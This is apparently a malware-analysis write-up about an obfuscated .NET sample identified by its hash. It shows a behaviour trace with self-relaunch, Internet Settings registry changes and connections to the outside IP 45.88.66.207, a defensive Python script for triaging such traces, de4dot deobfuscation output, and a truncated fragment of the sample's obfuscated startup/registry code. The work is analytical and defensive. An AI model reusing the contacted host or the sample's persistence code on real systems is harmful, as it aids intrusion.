09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:4972,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:539,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:4960,	9028,	FILE_chmod,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll,	attrib:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:617,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\Microsoft.NET\Framework,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:679,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:695,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:695,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll.aux,	offset:0x00000000 datalen:0x000000B0 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:695,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll,	base:0x000000006FDD0000 size:0x0140E000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\03a6965bc1bb789f37779e8951ecafc7\Microsoft.VisualBasic.ni.dll.aux,	offset:0x00000000 datalen:0x000006AC ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:710,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll.aux,	offset:0x00000000 datalen:0x0000026C ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:758,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll,	base:0x000000006F370000 size:0x00A55000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:758,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:758,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll.aux,	offset:0x00000000 datalen:0x00000384 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:789,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll,	base:0x000000006EB50000 size:0x00818000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:10:821,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\03a6965bc1bb789f37779e8951ecafc7\Microsoft.VisualBasic.ni.dll,	base:0x00000000730B0000 size:0x001E2000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:043,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:055,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\37c31fb353175d6efd4ca9dc426cab68\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:055,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\59978a45568399ef08cfe99da6a725bb\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:055,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\dd2f3bb5941e68b9d4d6affbe6fcc632\System.Windows.Forms.ni.dll.aux,	offset:0x00000000 datalen:0x000006B8 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\167c4b04ac34ab24a58f841c21862a3e\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\67e34187cff6cf0d7e49a0b354229d26\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ef599b69e76b0aaae802df819481912b\System.Drawing.ni.dll.aux,	offset:0x00000000 datalen:0x00000248 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:070,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ef599b69e76b0aaae802df819481912b\System.Drawing.ni.dll,	base:0x0000000072B50000 size:0x001A3000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:11:101,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\dd2f3bb5941e68b9d4d6affbe6fcc632\System.Windows.Forms.ni.dll,	base:0x000000006DCE0000 size:0x00E68000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:182,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:182,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll.aux,	offset:0x00000000 datalen:0x00000360 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:182,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000072420000 size:0x00106000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:213,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:213,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll.aux,	offset:0x00000000 datalen:0x000002EC ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:228,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll,	base:0x000000006D330000 size:0x00774000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:244,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00000FFF ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:244,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config,	offset:0x00000000 datalen:0x00001000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:260,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll,	base:0x0000000072F60000 size:0x0008E000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:12:275,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x000000006D1C0000 size:0x0016F000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:16:197,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:7628,	9028,	FILE_read,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	offset:0x00000000 datalen:0x000D2C00 ,	0x00000000 [The operation completed successfully.  ],	
09:37:16:197,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	PROC_exec,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	target_pid:2092 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:793,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:0,	9028,	EXEC_create,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:9028 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' image_base:0x0000000000E70000 image_size:0x000D8000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:8300,	9028,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	eof:0x00000000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:8300,	9028,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	offset:0x00000000 datalen:0x000005E6 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:8300,	9028,	FILE_read,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe.log,	,	0x00000000 [The operation completed successfully.  ],	
09:37:48:808,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:0,	9028,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll,	base:0x000000006D1C0000 size:0x0016F000 ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:839,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	9028:0,	9028,	EXEC_destroy,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:8200 cmdline:'C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix,	type:0x00000001 datalen:2 data:'00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix,	type:0x00000001 datalen:16 data:'43 6F 6F 6B 69 65 3A 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix,	type:0x00000001 datalen:18 data:'56 69 73 69 74 65 64 3A 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:855,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [The operation completed successfully.  ],	
09:37:48:871,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:1484,	9028,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [The operation completed successfully.  ],	
09:37:57:432,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:4724,	9028,	NET_connect,	45.88.66.207:80,	protocol:(TCP)0 ,	0x00000000 [The operation completed successfully.  ],	
09:38:04:740,	99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	2092:0,	9028,	EXEC_destroy,	C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe,	parent_pid:9028 cmdline:'"C:\Users\bonelee\Desktop\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe"' ,	0x00000000 [The operation completed successfully.  ],

  

As the trace shows, the sample makes network connections (the NET_connect events above).
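One way to triage a trace in this layout, as an added example that is not part of the original post or of the monitoring tool: it parses the comma+tab-separated columns, decodes REG_setval data, and links a self-relaunch to the child's NET_connect events. The column meanings are inferred from the lines above; the sample rows, PIDs, SID and the 203.0.113.10 address are constructed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    time: str    # HH:MM:SS:mmm
    image: str   # executable name of the acting process
    pid: int
    tid: int
    root: str    # fourth column; its meaning (tracked root PID) is an assumption
    event: str   # e.g. PROC_exec, REG_setval, NET_connect
    target: str  # path, registry value or ip:port
    detail: str
    status: int  # 0 = success


def parse_line(line):
    """Split one trace row on the comma+tab separator; None if it is not a row."""
    parts = [p.strip() for p in line.rstrip(", \t\r\n").split(",\t")]
    if len(parts) != 8 or ":" not in parts[2]:
        return None
    pid, tid = parts[2].split(":", 1)
    try:
        return Event(parts[0], parts[1], int(pid), int(tid), parts[3], parts[4],
                     parts[5], parts[6], int(parts[7].split()[0], 16))
    except (ValueError, IndexError):
        return None


def decode_reg(detail):
    """Decode REG_setval data: DWORD as int, string as text, anything else as hex."""
    m = re.search(r"type:0x([0-9A-Fa-f]+)\s.*data:'([0-9A-Fa-f ]*)'", detail)
    if not m:
        return None
    kind, raw = int(m.group(1), 16), bytes.fromhex(m.group(2).replace(" ", ""))
    if kind == 4:   # REG_DWORD, little-endian
        return int.from_bytes(raw[:4], "little")
    if kind == 1:   # REG_SZ; the trace prints one byte per character
        return raw.rstrip(b"\x00").decode("latin-1")
    return raw.hex()


def triage(text):
    """Summarise process launches, registry writes and outbound connections."""
    events = [e for e in map(parse_line, text.splitlines()) if e]
    children, net = defaultdict(list), defaultdict(list)
    relaunches, reg = [], []
    for e in events:
        if e.event == "PROC_exec":
            m = re.search(r"target_pid:(\d+)", e.detail)
            if m:
                child = int(m.group(1))
                children[e.pid].append(child)
                # The process started a second copy of its own image.
                if e.target.lower().endswith("\\" + e.image.lower()):
                    relaunches.append((e.pid, child))
        elif e.event == "NET_connect" and e.status == 0:
            net[e.pid].append((e.time, e.target))
        elif e.event == "REG_setval":
            reg.append((e.pid, e.target.rsplit("\\", 1)[-1], decode_reg(e.detail)))
    findings = []
    for parent, child in relaunches:
        endpoints = sorted({ep for _, ep in net.get(child, [])})
        if endpoints:
            findings.append(f"pid {parent} relaunched its own image as pid {child}, "
                            f"which connected to {', '.join(endpoints)}")
    return {"events": len(events), "children": dict(children),
            "net": dict(net), "reg": reg, "findings": findings}


def row(*fields):
    """Build one constructed trace row in the comma+tab layout."""
    return ",\t".join(fields) + ",\t"


# Constructed sample rows (not taken from the trace above).
IMG = r"C:\Users\u\Desktop\sample.exe"
IS = r"HKEY_USERS\S-1-5-21-0-0-0-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
OK = "0x00000000 [The operation completed successfully.  ]"
SAMPLE_TRACE = "\n".join([
    row("09:00:01:000", "sample.exe", "100:0", "100", "PROC_exec", IMG,
        "target_pid:200 cmdline:'\"" + IMG + "\"' ", OK),
    row("09:00:02:000", "sample.exe", "200:0", "100", "EXEC_create", IMG,
        "parent_pid:100 cmdline:'\"" + IMG + "\"' image_base:0x0000000000E70000 ", OK),
    row("09:00:02:010", "sample.exe", "100:8", "100", "FILE_modified",
        r"C:\Users\u\AppData\Local\x.log", "", OK),
    row("09:00:02:050", "sample.exe", "200:7", "100", "REG_setval",
        IS + r"\ZoneMap\ProxyBypass", "type:0x00000004 datalen:4 data:'01 00 00 00 ' ", OK),
    row("09:00:02:050", "sample.exe", "200:7", "100", "REG_setval",
        IS + r"\5.0\Cache\Cookies\CachePrefix",
        "type:0x00000001 datalen:16 data:'43 6F 6F 6B 69 65 3A 00 ' ", OK),
    row("09:00:02:070", "sample.exe", "200:7", "100", "NET_connect",
        "203.0.113.10:80", "protocol:(TCP)0 ", OK),
    row("09:00:10:400", "sample.exe", "200:9", "100", "NET_connect",
        "203.0.113.10:80", "protocol:(TCP)0 ", OK),
])

if __name__ == "__main__":
    for finding in triage(SAMPLE_TRACE)["findings"]:
        print(finding)
```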


The sample is obfuscated:

D:\app\de4dot-built-binaries-main\net45>de4dot.exe -d D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe

de4dot v3.1.41592.3405

Detected DeepSea 4.1 (D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe)

D:\app\de4dot-built-binaries-main\net45>de4dot.exe  D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe

de4dot v3.1.41592.3405

Detected DeepSea 4.1 (D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe)
Cleaning D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d.exe
Renaming all obfuscated symbols
ERROR: Could not resolve MethodRef Jw97Bt.Kz97Rd/b7KXo3.r1L9Hg Jw97Bt.Kz97Rd/f2D0Sc.y5C8Sj<Jw97Bt.Kz97Rd/b7KXo3.r1L9Hg>::N() (0A00002D) (from Gk73K -> Gk73K)
WARNING: Could not find resource WindowsApp1.Resources
Saving D:\Downloads\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d\99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d-cleaned.exe
Ignored 4 warnings/errors
Use -v/-vv option or set environment variable SHOWALLMESSAGES=1 to see all messages

  

The key code is obfuscated. Extracting it shows that it is still obfuscated! After deobfuscating it further, the code looks roughly like this:

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;

namespace FIFAWORLDCUP
{
	// Token: 0x0200001C RID: 28
	public class Class12_Startup
	{
		// Token: 0x06000115 RID: 277 RVA: 0x0001E810 File Offset: 0x0001CA10
		internal static bool FinishContinuations(string string_0, string string_1, string string_2, bool bool_0)
		{
			bool flag = Convert.ToInt32((double)-18693f) + Convert.ToInt32(42805.0 + Math.Round(42805.5)) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32((double)66917f) / <Module>.ValidateKeyView(int.Parse("9")) != 0;
			using (RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(string_0, Convert.ToInt32((double)-25980f) + Convert.ToInt32(3328.5026746201584 - Math.Cos(1664.0)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32((double)22652f) / <Module>.ValidateKeyView(int.Parse("9")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0))
			{
